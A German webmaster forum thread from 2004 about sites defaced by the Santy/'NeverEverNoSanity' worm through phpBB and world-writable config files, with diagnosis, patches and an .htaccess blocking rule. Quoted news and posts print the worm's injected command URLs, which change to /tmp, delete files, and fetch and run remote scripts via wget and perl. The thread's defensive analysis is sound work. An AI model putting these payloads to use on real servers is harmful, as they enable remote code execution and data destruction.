Moin,
bin nicht sicher, ob's ab vkpMX 2.1 liegt. Heute wurden auf meinem Server alle Dateien im root und in /modules, die irgendwie "*config*.*" in ihrem Namen tragen gegen eine htnl-Datei ausgetauscht.
Dazu der dezente Hinweis:
This site is defaced!!!
NeverEverNoSanity WebWorm generation 11.
Muss ich dem Provider auf die Füße steigen ?
Gruß
DeepThought
Hallo !
Verwendest du irgendwelche Fremdmodule, die nicht beim MX-Addonpack dabei sind ?
Kannst du uns die log-Dateien zukommen lassen ?
MfG
jubilee
Moin jubilee,
yep, Fremdmodule sind dabei, für diesen Fall aber unerheblich. Ich vermute eher einen Fehler am Server, weil der einfach das Überschreiben der Dateien zugelassen hat. Oder irgendeine Pottsau hat meine Zugangsdaten. *vermutunghegt*
Das Log bekomme ich heute nacht und kann es dir morgen früh gerne mailen.
DeepThought
Hallo !
ZitatDas Log bekomme ich heute nacht und kann es dir morgen früh gerne mailen.
Ja, das wäre schon. Wenn möglich schreib noch den ungefähren Zeitpunk dabei, wann das System
gehackt worden sein könnte.
MfG
jubilee
Moin :)
denke das dürfte der sein:
http://www.heise.de/newsticker/meldung/54504
http://www.nukeboards.de/index.php?showtopic=26511
Hallo tora
Besteht dieses Problem beim MX auch und wenn ja wie kann man sich schützen?
mfg
Moin :)
Im mX direkt besteht das Problem nicht. Es sei denn, du hast den phpBB-Port zum laufen gebracht.
Allerdings kann durch diesen Bug auch Dateien oder Datenbankeinträge des mX beeinflusst werden, wenn auf dem gleichen Server (nicht nur Domain) ein ungefixtes phpBB-Board läuft. Zu den "ungefixten phpBB-Boards" zähle ich hier auch php-Nuke ab Version 6.5.
Einen Schutz für dich gibt es nicht, wenn die Hacker über einen anderen virtuellen Host (o.Ä.) kommen, der auf dem selben Server läuft.
Über die PHP Einstellungen müsste etwas zu machen sein:
- allow_url_fopen >> OFF
- safe_mode >> ON ??
Das Ganze ist in der Gefährlichkeit vergleichbar mit dem bekannten Bug in älteren Versionen der myEgallery oder Coppermine (nuke).
Hmmm ....
Aber der DeepThought hat auch kein
phpBB am laufen ?!
Das muss noch etwas anderes sein ....
MfG
jubilee
Vielleicht doch das sicherheits loch in PHP selbst?
Hallo !
ZitatVielleicht doch das sicherheits loch in PHP selbst?
Ähh, was meinst du damit ??
Mfg
jubilee
Da gibts doch eins in der PHP 4.3.9er oder nicht?? Muss ja en Grund haben das die einen 4.3.10 rausbringen
Zitat von: Tora am 21 Dezember 2004, 16:58:00
Moin :)
denke das dürfte der sein:
http://www.heise.de/newsticker/meldung/54504
http://www.nukeboards.de/index.php?showtopic=26511
Tora haste dir mal dei kommentare bei heise angesehen?? DER UNTERGANG VON PHP. He das die Leute gleich so übertreiben müssen.
Moin :)
da ist noch einer, der von vatersein.de verlinkt ist: http://www.papa-board.de/
Und da läuft ein phpBB-Board.
Weiss ja nicht, ob die Seiten zusammenhängen, aber die Meldungen sind identisch.
ZitatThis site is defaced!!!
NeverEverNoSanity WebWorm generation 22.
Hmm, wenn ich mir die Bugbeschreibung der PHP-Versionen so durchlese, könnte das auch daher kommen....
Mal abwarten, ob DeepThought nähere Info's geben kann...
Hallo !
Zitatda ist noch einer, der von vatersein.de verlinkt ist: http://www.papa-board.de/
Und da läuft ein phpBB-Board.
Ah, ich hab nur die Seite aus dem Profil angeschaut.
Doch sinnvoll, wenn die Fragesteller auch gleich den link dazu posten.
Denn wird es wohl auf der seite mit dem phpBB sein, wo's gehackt hat ;)
ZitatHmm, wenn ich mir die Bugbeschreibung der PHP-Versionen so durchlese, könnte das auch daher kommen....
Die hier haben gewisses potential :
Zitat
CAN-2004-1063 - safe_mode execution directory bypass.
CAN-2004-1064 - arbitrary file access through path truncation.
bug #30990 (allow popen() on *NIX to accept 'b' flag).
(ohne das jetzt weiter genauer durchgelesen zu haben)
MfG
jubilee
Sacht bloss könnte irgendwie recht gehabt haben??
Update:
http://www.heise.de/newsticker/meldung/54504
Oh Mann da bin ich ja mal gespannt wanbn das teil bei mir ankommt.
'n Abend,
es ist definitv meine Site gehackt (www.vatersein.de) worden und phpBB setze ich nicht ein. Ich habe im root und in /modules alle Dateien ersetzen müssen, die denortschnipsel "config" in sich haben. Die Originadateien sind durch 270 Byte Dateien ersetz worden. Wer eine zur Ansicht haben möchte, einfach melden - ist aber einfachstes html, also nicht wirklich spannend.
Die Site papa-Board.com ist im Rahmen des WebRings und hat technisch nix mit meiner zu tun.
Interessant in diesem Zusammenhang vielleicht noch die Info, dass exakt 24h vorher eine enorme Last auf meinem Server war, die ich allerdings im Log nicht sehe. Zumindest hing die Site wie nix gutes durch (Ladezeit 4 Minuten). Provider ist all-inkl.com; vom Tarif 100 Kunden auf einem Server (sagen die jedenfalls *gg*).
Gruß
DeepThought
Hmmm ...
ZitatWer eine zur Ansicht haben möchte, einfach melden - ist aber einfachstes html, also nicht wirklich spannend
Auf jeden Fall die Logs schicken.
Da müssen wir dann mal reinschauen, was da genau vorgefallen ist ....
Mfg
jubilee
Mal abgesehen davon, dass die Config Dateien ersetzt wurden - gab es sonst irgendwelche Verluste (etwa Datenbankeinträge oder so?)
Nochmal zur Erläuterung, Zitat aus dieser Meldung:
http://www.heise.de/security/news/meldung/53511
ZitatAufgrund unzureichender Filterung von Benutzerparametern kann ein Angreifer eigene Kommandos an die SQL-Datenbank übergeben. Zudem ist die Software für Cross-Site-Scripting-Angriffe anfällig. Über das Modul viewtopic.php lassen sich unter Umständen sogar beliebige Kommandos auf dem Webserver ausführen. Betroffen sind alle Versionen bis einschließlich 2.0.10.
Durch bestimmte Aufrufparameter, die der viewtopic.php übergeben werden, werden vom php-Parser fast beliebige PHP-Befehle auf dem Server ausgeführt. Das funktioniert auch mit dem bbPort in phpNuke.
Ich habe gerade testweise auf einer Nuke Seite verschiedene Einstellungen der config.php ausgelesen. Genauso wäre es dort möglich gewesen, eine schädigende Datei dort zu includen....
JOp, bitte die Logfiles !!
hmm.... *leichtmuffensausenbekomm*
Kann man die Lücke in der viewtopic.php auf die Schnelle irgendwie schließen ?
Ich hab ja im vkpMx bbtonuke laufen in der Version 2.0.7....
GMS2K
http://www.phpbb.com/phpBB/viewtopic.php?f=14&t=240513
Guck sonst mal in die phpnuke-community, da steht noch einiges an Infos.
Mit dem 4nImpressum hat es aber nichts zu tun, oder?
Das hat er ja bei sich laufen....
Gruß
Bernd
Ne das von Warp-speed
Zitat von: JermaineBelgardio am 21 Dezember 2004, 22:05:56
Mal abgesehen davon, dass die Config Dateien ersetzt wurden - gab es sonst irgendwelche Verluste (etwa Datenbankeinträge oder so?)
Nein, sonst keinerlei Veränderungen.
Log-file ist eben auf den Weg gebracht.
DeepThought
Na da bin ich jetzt mal gespannt, woran es gelegen hat bzw. wie die rein gekommen sind!?
Gruß
Bernd
Ich müsste das Logfile auch mal bitte haben.
Nach vielen Mails mit anderen Providerkollegen sind seid 3-5 Tagen regelrechte Fluten an Serveranfragen geflossen. Der richtige Boom wird aber noch kommen. Es wurden schon Server mit entsprechenden Scripten gefunden die Zeit gesteuert das Net absuchen und entsprechendes ausführen. Das wird ein ähnlicher Hype wie Andi bereits sagte mit der Gallery.
Auch bei uns sind entsprechende Lasten zur Zeit unterwegs.
Zum Glückl war da all-inkl schnell weil auf meinem Account ist schon PHP5.0.3 und bb benutz ich da eh nicht jedenfalls nix originales unsicheres:-)
Zitat von: GMS2K am 21 Dezember 2004, 22:57:16
hmm.... *leichtmuffensausenbekomm*
Kann man die Lücke in der viewtopic.php auf die Schnelle irgendwie schließen ?
Ich hab ja im vkpMx bbtonuke laufen in der Version 2.0.7....
GMS2K
Moin :)
kurz und bündig, hier hat Monika den Fix in deutsch geschrieben:
http://www.nukeboards.de/index.php?showtopic=26511
Wobei die nuke-Ports zur Zeit noch nicht gross bétroffen sein dürften, weil die "Hackroboter" nur über den Direktaufrufen der viewtopic.php ihr Spielchen treiben.
Da aber Nuke ein beliebtes Ziel für Hacker ist, wird es nicht lange gehen, bis auch die Aufrufparameter für den Nukeport irgendwo zu finden sind. So gross ist der Unterschied da nicht....
Zitat von: NeMeSiSX2LC am 22 Dezember 2004, 11:23:11
Zum Glückl war da all-inkl schnell weil auf meinem Account ist schon PHP5.0.3 und bb benutz ich da eh nicht jedenfalls nix originales unsicheres:-)
Glückwunsch, ich hab' mich für dich geopfert :P Meine HP steht auch bei all-inl.
Zitat von: DarkBoy am 22 Dezember 2004, 11:19:34
Ich müsste das Logfile auch mal bitte haben.
Nach vielen Mails mit anderen Providerkollegen sind seid 3-5 Tagen regelrechte Fluten an Serveranfragen geflossen. Der richtige Boom wird aber noch kommen. Es wurden schon Server mit entsprechenden Scripten gefunden die Zeit gesteuert das Net absuchen und entsprechendes ausführen. Das wird ein ähnlicher Hype wie Andi bereits sagte mit der Gallery.
Auch bei uns sind entsprechende Lasten zur Zeit unterwegs.
Jubilee, forwarde doch bitte das log von mir an DarkBoy; seine E-Mail-Adresse habe ich nicht. Eben bekam ich von all-inkl den Hinweis, meine Site würde heute nacht auf einen stärkeren Server umziehen wegen der ungewöhnlich hohen Last.
DeepThought
Hallo !
@DeepThought: hast Du denn gestern gegen 11:10-11:20 uhr in der Datenbank mit dem
Datenbankfrontend (phpMyAdmin?) gearbeitet ?
MfG
jubilee
@jubilee
ja, aber nicht schreibend. Nur in Bezug auf die Fehlersuche geguckt, ob mir einer irgendeinen dusseligen java- oder html-code in die artikel geschrieben hat.
Gruß
DeepThought
Hmmm ....
Kannst du auch die error_log aus dem besagten Zeitraum besorgen ?
@jubilee
error-log ist via-E-mail raus (75 KByte gepackt). Ist wohl einiges gelaufen, sagt all-inkl.
Gruß
DeepThought
Hmm ....
Anhand der log-dateien kann ich eigentlich nix sehen. Hast Du die Dateien gesichert, die anstatt der
originale auf Deinem Webspace lagen ?!
Was stand da drin ?
Was mich stutzig macht, das in den Logfiles nirgends Fehlermeldungen auftauchen, die darauf schließen lassen, das
das Portalsystem nicht mehr läuft. Das müsste aber eigentlich doch der Fall sein, wenn sämmtliche Config-Files überschrieben sind ?!
So, ok, ich glaub ich habe es.
Verursacher ist der Wurm. Der hat aber nicht dein Webspace befallen, sondern auf dem Server muss noch ein anderer Account sein, der das phpBB einsetzt. Dieses ist gehackt worden. Warum sind jetzt bei Dir auch Scripte befallen ?
Ganz einfach weil diese Scripte bei dir mit chmod 666 oder 777 gesetzt waren. Da das i.d.R. nur die
config-Scripte sind, sind auch nur diese ersetzt worden. Wenn Du alle Scripte auf chmod 666 gehabt hättest, wären auch alle Scripte
(wie bei den anderen geschädigten) geändert worden.
Also ist nicht davon auszugehen, das eine Sicherheitslücke im MX2.1 existiert
MfG
jubilee
Hallo jubilee,
yep, das ist es. :genie: Ich bin eben noch mal über den Server geflitzt und habe mir die Attribute angesehen. Standen doch tatsächlich auf 666 - schöne Sch.... mein fortgeschrittener Gelenkrheumatismus lässt zum Glück nicht zu, was ich mich könnte...
Die config-Dateien wurden ersetzt gegen eine html.datei, halt nur mit extension .php. Diese werden ja per include eingebunden und geben damit bei Aufruf den html-code wieder.
Was lernen wir daraus?
1. Sauschnelle Hilfe hier
2. Vorher gucken, dann fragen
Euch allen frohe Weihnachten
DeepThought
DeepThought Hm aber auf dem gleichen Server sind wir nicht:-)
Hallo!
Hab mal bei meinem PHPBB Forum mal nach geguck ob der was hat, da er eigentlich Ofline ist bzw. den Link niemand wissen sollte aber siehe da was seh ich ein Administrator Online und ein Gast.
Aha denk mir so einzufall (:
Im Adminmenü nach guck : Gast 22 Dez 2004 11:39 pm 22 Dez 2004 11:39 pm FAQ anzeigen 66.249.66.161
Trace die IP: 66.249.66.161 crawl-66-249-66-161.googlebot.com
Naja weiss nicht so Recht ob es mit dem Ganzen Thema was zu tun hat aber wollts mal posten.
L.g
Nachtrag: Der Gast ist im Adminteil 5 mal Online mit der Selben IP siehe oben.
Hallo !
ZitatTrace die IP: 66.249.66.161 crawl-66-249-66-161.googlebot.com
das bedeutet, das einCrawler von Google Deine Seite durchsucht und indiziert hat.
Somit ist die gefährdete Datei viewtopic.php auch Deines phpBB über google zu finden !
Und genauso geht der Wurm vor. Er sucht über google nach der viewtopic.php des phpBB-Forums.
Also, dann mach mal schnell ein update oder spiel zumindest den Hotfix ein, sonst sind Deine Seiten in kürze auch überschrieben ....
MfG
jubilee
Zitat
Also, dann mach mal schnell ein update oder spiel zumindest den Hotfix ein, sonst sind Deine Seiten in kürze auch überschrieben ....
Wie gesagt da die Seite noch nicht fertig und Online ist, ist es zum Teil egal wenn dies passiert. Mach aber in den nächsten Tagen das Update.
L.g
Munzur
deine Seite mit dem phpbb ist zwar noch nicht online, aber das teil liegt nunmal schon auf einem Server und wurde von Google indexiert.
Denkst du auch mal daran das auf dem Server noch andere Seiten liegen könnten welche schon online sind?
über dein Board kann der wurm dann auch auf die anderen Sites zugreifen.
Ich denke das Beispiel von DeepThought hat allen hier deutlich gezeigt wie schnell es gehen kann!
@ Homi
Danke das du dich um mich bzw. um die anderen User auf dem Server sorgst aber hab nen Rootserver *bussi*
L.g
PS: Warum schon wieder 2 Minuspunkte? Ich hasse diese beurteilungen! Wenns möglich ist will ich mich da ausschliesen. Bleib liebend gern auf 0!
@jogi24 ich kreig wegen diesem post von dir ein Minus!?? Warum denn das? Jetzt sinds schon -7 DANKE
Zitatich kreig wegen diesem post von dir ein Minus!?? Warum denn das? Jetzt sinds schon -7 DANKE
Schau mal bei mir .....jetzt sind es -20 .....aber gleich sind es -30 :)
mfg
Onkel
ZitatWarum schon wieder 2 Minuspunkte? Ich hasse diese beurteilungen! Wenns möglich ist will ich mich da ausschliesen. Bleib liebend gern auf 0!
Schau mal bei mir .....jetzt sind es -20 .....aber gleich sind es -30
Schon gut. Ihr bekommst beide ein tröstungs-PLONK von mir ( aber erst am 24. 12 aufmachen ;) )
MfG
jubilee
Wurm attackiert PHP-Skripte
Die bereits gestern gemeldete Santy-Version mit Yahoo-Suche hat es offenbar in sich. heise Security erreichen immer mehr Berichte von attackierten Servern. Der Wurm verbindet sich unter anderem mit einem IRC-Server, in dessen Wurm-Channel bereits über 700 Zombies angemeldet sind, die der Wurm kontrolliert. Über spezielle Kommandos können diese Zombies unter anderem Port-Scans und verteilte DoS-Angriffe durchführen.
Offenbar versucht der Wurm systematisch Schwachstellen in PHP-Skripten zu finden, um sich zu verbreiten. Dazu sucht er auf der brasilianischen Google-Seite nach URLs mit PHP-Skripten und probiert alle Variablen durch, die er aus der gefundenen URL extrahieren kann. In diese schreibt er über die URL Code der Form:
http://www.visualcoders.net/spy.gif?&cmd=cd /tmp;\
wget www.visualcoders.net/spybot.txt;
Überprüft das Skript den Inhalt der Variablen nicht ausreichend, werden unter Umständen die in der URL aufgeführten Kommandos ausgeführt. Der überlaufende IRC-Channel beweist, dass der Wurm mit dieser einfachen Vorgehensweise anscheinend erschreckend oft Erfolg hat. Der Wurm erzeugt mit den Anfragen eine beträchtliche Last auf dem Server.
heise Security hat bereits versucht, die Administratoren der für diesen Zweck missbrauchten Site www.visualcoders.net zu benachrichtigen, aber bisher keine Antwort erhalten.
Quelle:Heise
Hallo,
Ist da schon was bekannt drüber???
Hallo !
ZitatIst da schon was bekannt drüber???
ZitatOffenbar versucht der Wurm systematisch Schwachstellen in PHP-Skripten zu finden, um sich zu verbreiten. Dazu sucht er auf der brasilianischen Google-Seite nach URLs mit PHP-Skripten und probiert alle Variablen durch, die er aus der gefundenen URL extrahieren kann. In diese schreibt er über die URL Code der Form:
Ja, klassisches Beispiel von XSS / Command-Injection.
Dieser Art Schwachstellen sind schon lange bekannt.
Machen kannst Du da wenig dagegen, ausser sauber gecodete Scripte zu verwenden.
Ausserdem schiesst dieser "Wurm" ja sozusagem mit "Kanonen auf Spatzen". Die Wahrscheinlichkeit, ein Script zu finden das die
nach aussen offenen Variablen direkt an die Shell gibt (mit exec(), system(), passthru() etc...) ist m.M. nach doch mehr als gering.
Das ist Voraussetzung um nach /tmp zu changen und dann den spybot.txt downzuloaden und zu speichern.
Ich denke es geht wieder um eine spezifische lücke die der Autor kennt, damit diese nicht bekannt wird,
greift er generell jedes Script so an. So sind Gegenmaßnahmen nicht so schnell zu finden, wenn man nicht weiss auf welches Script der Angriff zielt ...
MfG
jubilee
Moin :)
so wie es in der who-Online Liste auf pragmamx.de aussieht, versucht der Wurm über mehrere uralte Sicherheitslücken in phpNuke anzugreifen.
Das funktioniert aber nicht in neueren Nuke-Versionen und schon garnicht im vkpMx.
Trotzdem wird dadurch unheimlich viel Traffic verursacht, weil bei jedem Aufruf der Schad-Url die vollständige "Modul ist nicht aktiv" Meldung angezeigt wird.
Im Coppermine-Forum habe ich folgenden Supertip gefunden:
http://coppermine.sourceforge.net/board/index.php?topic=12838.0
ZitatVersions of the worm will deface any site it can find on a server. If someone else on your server has a vulnerable version of phpBB, and other countermeasures are not implemented by your server host, your site will be defaced through no fault of your own.
A newer version of the worm will install an IRC controlled DDOS bot instead (or as well as, I'm not sure yet) of defacing sites.
The worm will try any and every php file it can find even though they are not necessarily phpBB. This will push your bandwidth usage through the roof. To guard against that, you can either edit each and every PHP file to just abort when it gets queried by the worm (easier siad than done) or if your host has mod_rewrite (most apache installations do), put the fllowing into a .htaccess file :-
RewriteEngine On
RewriteCond %{QUERY_STRING} &cmd=cd%20/tmp;
RewriteRule .* - [F,L]
This will block the three variants that I am aware of. I will update this if needed as time progresses.
Although this worm only affects phpBB, I would not consider php 4.3.8 'safe'. Hosts need to patch the problems in earlier versions or upgrade to 4.3.10
Also eine .htaccess Datei mit dem entsprechenden Inhalt anlegen, oder die 2 Zeilen an die bereits bestehende .htaccess Datei anfügen. RewriteEngine On
RewriteCond %{QUERY_STRING} &cmd=cd%20/tmp;
RewriteRule .* - [F,L]
Die Zeilen bewirken, dass wenn die Schad-Url aufgerufen wird, bzw. wenn der String
&cmd=cd /tmp; in der URL vorkommt, eine 403er "Zugriff verweigert" Meldung generiert wird und nicht die ganze Seite aufgebaut wird.
Beispiel:
http://www.pragmamx.de/modules.php?name=http://envidiosos.org/~pillar/.zk/php.gif?&cmd=cd%20/tmp.... (http://www.pragmamx.de/modules.php?name=http://envidiosos.org/~pillar/.zk/php.gif?&cmd=cd%20/tmp;rm%20-rf%20*;wget%20envidiosos.org/~pillar/.zk/sess_189f0f0889555397a4de5485dd611111;perl%20sess_189f0f0889555397a4de5485dd611111;wget%20envidiosos.org/~pillar/.zk/sess_189f0f08895)
Hi Andi, ;)
Welche 2 Zeilen denn...ich sehe 3 Zeilen....!?
ZitatRewriteEngine On
RewriteCond %{QUERY_STRING} &cmd=cd%20/tmp;
RewriteRule .* - [F,L]
Muss ich das "Mod-Service aktiv?" dann auf ON haben?
Oder hat das modrewrite damit nichts zu tun?
Wenn ja, welche Einstellungen muss ich hier machen: mod_rewrite Unterstützung aktivieren?
LG
Bernd
Hi Bernd 8)
ZitatWelche 2 Zeilen denn...ich sehe 3 Zeilen....!?
es sind 3 Zeilen, wenn noch keine .htaccess Datei existiert, bzw. wenn in einer evtl. bestehenden, das mod_rewrite nicht aktiviert ist. Also, wenn diese Zeile fehlt:
RewriteEngine OnIm vkpMx 2.1
pro ist ja bereits eine .htaccess Datei dabei, wo diese Zeile drin steht. Vorausgesetzt, die Datei wurde umbenannt (und damit aktiviert)
ZitatMuss ich das "Mod-Service aktiv?" dann auf ON haben?
Egal, das alles spielt sich nur innerhalb des Apachen ab und hat mit den Einstellungen im vkpMx nichts zu tun.
ZitatOder hat das modrewrite damit nichts zu tun?
Doch schon, die Zeilen sind nur 2 zusätzliche Regeln für das mod_rewrite.
Als Beispiel, die ersten Zeilen meiner .htaccess von http://vkp.shiba.de
# rename this file to .htaccess, and you will get nice and clean urls.
<IfModule mod_rewrite.c>
Options +FollowSymLinks
RewriteEngine on
# Depends on your configuration, you must set RewrteBase to
# switch on Mod_rewrite. See for this the online docs:
# http://httpd.apache.org/docs/mod/mod_rewrite.html
#
RewriteBase /
# [NeverEverNoSanity WebWorm] Fix
RewriteCond %{QUERY_STRING} &cmd=cd%20/tmp;
RewriteRule .* - [F,L]
# individuelle Rewrite-Regeln:
RewriteRule ^home\.htm(l?) index.php [L]
RewriteRule ^backend\.htm(l?)|rss\.xml backend.php [L]
# Your_Account Modul:
## undsoweiterundsofort.......PS...
Das Ding funzt wirklich. Hatten wir den ganzen Tag über, auf pragmamx.de ständig bis zu 10 Wurm-Aufrufe in der Onlineliste, so sind es jetzt nur noch NULL, keine, weg sind se.... ;)
Also braucht man hierbei mit dem vkpMX 2.1 keine Angst haben, oder?
Und wenn ja, wie richte ich diese .htaccsess Datei ein?
Hallo !
ZitatAlso braucht man hierbei mit dem vkpMX 2.1 keine Angst haben, oder?
Und wenn ja, wie richte ich diese .htaccsess Datei ein?
Nein, Gefahr besteht beim vkpmx 2.1 nicht.
MfG
jubilee
Wie sieht es denn mit der Sicherheit des SMF aus???
Ich meine als Stand-Alone oder auch im Mx integriert!?
Habe nämlich vor, von eBoard auf SMF umzustellen!
Gruß
Bernd
Moin :)
ZitatWie sieht es denn mit der Sicherheit des SMF aus???
Denke dass das SMF eines der sichersten Boards sein wird. Geschwindigkeit und Sicherheit sind die beiden Hauptprioritäten des Entwicklerteams (höhöhö, wie bei uns...).
Bei Problemen wird vom Team sehr schnell reagiert, siehe hier:
http://www.simplemachines.org/community/index.php?topic=22008.0
http://www.simplemachines.org/community/index.php?topic=21787.0
Zitatoder auch im Mx integriert!?
Die mx-Version, wenn es die irgendwann geben wird, wird sich vom Original nur sehr wenig unterscheiden, damit die Fixe und Updates schnellstmöglich und ohne grossen Aufwand eingearbeitet werden können.
Wie bereits beim Coppermine-Port....
Hi Andy,....ich komm bei denen irgendwie nicht rein...Passwort hab ich angefordert, aber kömmt nix....könntest Du mir bitte den SMF-Patch per Mail zusenden?
admin@biker-unity.de
Danke! ;)
Hat sich erledigt...habe dann doch schon nach 3 Stunden die Zugangsdaten per Email bekommen! *lol*
...naja, ist ja auch ein langer Weg bis nach Germany...*ggg*
Gruß
Bernd
ZitatPHP im Visier: Santy-Wurm weitet seinen Angriff aus
PHP im Visier: Santy-Wurm weitet seinen Angriff aus
Der in der vergegangenen Woche aufgetauchte Santy-Wurm hat seine Angriffsstrategie geändert. Die erste Variante hatte es auf Web-Seiten abgesehen, bei denen das Forensystem phpBB zum Einsatz kommt. Um diese Seiten ausfindig zu machen, nutzte der Wurm die Suchmaschine Google. Google konnte seinerzeit die Ausbreitung des Wurms schnell stoppen.
Binnen weniger Tage sind jetzt allerdings gleich mehrere Weiterentwicklungen des Wurms Santy aufgetaucht. Santy.C und Santy.E attackieren nicht mehr nur Internet-Seiten mit phpBB, sondern generell Seiten, die in der Script-Sprache PHP programmiert wurden. Um es genauer zu sagen: Der Wurm hat es auf schlecht in PHP programmierte Seiten abgesehen.
Über Google, Yahoo und AOL versucht der Wurm zunächst Seiten zu ermitteln, die in PHP geschrieben wurden und in denen die Funktionen \\\"include()\\\" und \\\"require()\\\" vorkommen. Diese Funktionen werden dazu genutzt, um den Inhalt von Dateien auf einer Website anzuzeigen. Wenn der Programmierer die an diese Funktion übergebenen Parameter im Code nicht sorgfältig genug überprüft, kann ein Angreifer diese Funktion mißbrauchen und im Extremfall die gesamte Kontrolle über den Webserver übernehmen.
Die französischen Sicherheitsexperten von K-OTik Security empfehlen, PHP-Seiten, in denen die beiden genannten Funktionen vorkommen, so umzuprogrammieren, dass die beiden Funktionen auf eine sichere Art und Weise verwendet werden.
Ouelle: http://www.pcwelt.de/news/sicherheit/106195/
Und wie ist nun das Risiko für unser VKP?
Und wie hoch ist das Risiko wenn die Seite auf einem vServer liegen?
Hallo !
ZitatUnd wie ist nun das Risiko für unser VKP?
Was ist denn "euer VKP" ?
Wenn Ihr das mx2.1/2.1.a verwendet, dann braucht Ihreuch da keinen Kopf drum machen.
ZitatUnd wie hoch ist das Risiko wenn die Seite auf einem vServer liegen?
Eine Gefahr geht auch von anderen Accounts/Webspaces aus, die auf dem gleichen Server liegen und
angreifbar sind (weil sie das phpBB verwenden oder unsichere Scripte etc ....). Über diesen Weg könnten, bei ungünstigerer Konfiguration, auch Seiten gehackt werden die von sich aus nicht angreifbar gewesen wären.
Daher nach Möglichkeit keine Dateien und Verzeichnisse world-writeable (chmod 666 / 777) setzen sondern
höchstens chmod 755 (Verzeichnisse) oder 655 (Dateien)
MfG
jubilee
Moin :)
ZitatDie französischen Sicherheitsexperten von K-OTik Security empfehlen, PHP-Seiten, in denen die beiden genannten Funktionen vorkommen, so umzuprogrammieren, dass die beiden Funktionen auf eine sichere Art und Weise verwendet werden.
Sorry, aber dieser Schwachfugtip könnte direkt aus der Computerbild entnommen sein.
Dieser Supertip gehört zu den primitivsten Grundregeln der php-Programmierung, da braucht man keine französischen Sicherheitsexperten.
Leider muss man aber eingestehen, dass gerade diese Regel in der Vergangenheit, bei versch. Nuke-Modulen nicht eingehalten wurde. Das ist der altbekannte myEgallery und (nuke) Coppermine Bug....
Also, nochmal:
Solange ihr keine, in diesem Sinne, unsicheren Module im vkpMx verwendet, seid ihr sicher.Der Rest, siehe Post von Jubilee...
Zitat von: jubilee am 29 Dezember 2004, 19:25:25
Hallo !
ZitatUnd wie ist nun das Risiko für unser VKP?
Was ist denn "euer VKP" ?
Wenn Ihr das mx2.1/2.1.a verwendet, dann braucht Ihreuch da keinen Kopf drum machen.
ZitatUnd wie hoch ist das Risiko wenn die Seite auf einem vServer liegen?
Eine (.......)
MfG
jubilee
Sorry! Sind eigentlich alle MX VKPs gemeint gewessen. Bei uns läuft noch das 2.0 weil wir gerade eine Umstellung planen.
Zum vServer: Also nur ein eigner Server gibt 100% Sicherheit wenn PHP eingesetzt wird?
Hallo !
ZitatSorry! Sind eigentlich alle MX VKPs gemeint gewessen. Bei uns läuft noch das 2.0 weil wir gerade eine Umstellung planen
Wenn Ihr immer die damals hier veröffentlichten Patche/Fixe eingespielt habt, sollte das soweit auch sicher sein.
Ich würde aber schon ein Update auf die nächte Version vorschlagen
ZitatZum vServer: Also nur ein eigner Server gibt 100% Sicherheit wenn PHP eingesetzt wird?
Der Einsatz von php als solches ist kein Sicherheitsproblem.
Problem sind immer schlecht gecodete Scripte. Darauf muss man das Augenmerk legen. Solange die Scripte gut und sicher Programmiert sind, gibt es kein Problem.
Ach wenn der Account alleine auf dem Server ist, kann die verwendung eines schlechten Scriptes die Seite angreifbar machen.
Das ist leider so. und je mehr Accounts auf einem Server liegen, je höher ist die Wahrscheinlichkeit das man ein oder mehrerer solcher Scripte findet.
MfG
jubilee
Hallo :)
ZitatBei uns läuft noch das 2.0 weil wir gerade eine Umstellung planen
ZitatWenn Ihr immer die damals hier veröffentlichten Patche/Fixe eingespielt habt, sollte das soweit auch sicher sein.
Jo, bereits das 2.0 war in dieser Beziehung abgesichert.
Ein Problem "könnte" in der damals enthaltenen myEgallery-Version sein, aber dafür wurde ein vorsorglicher Fix veröffentlicht.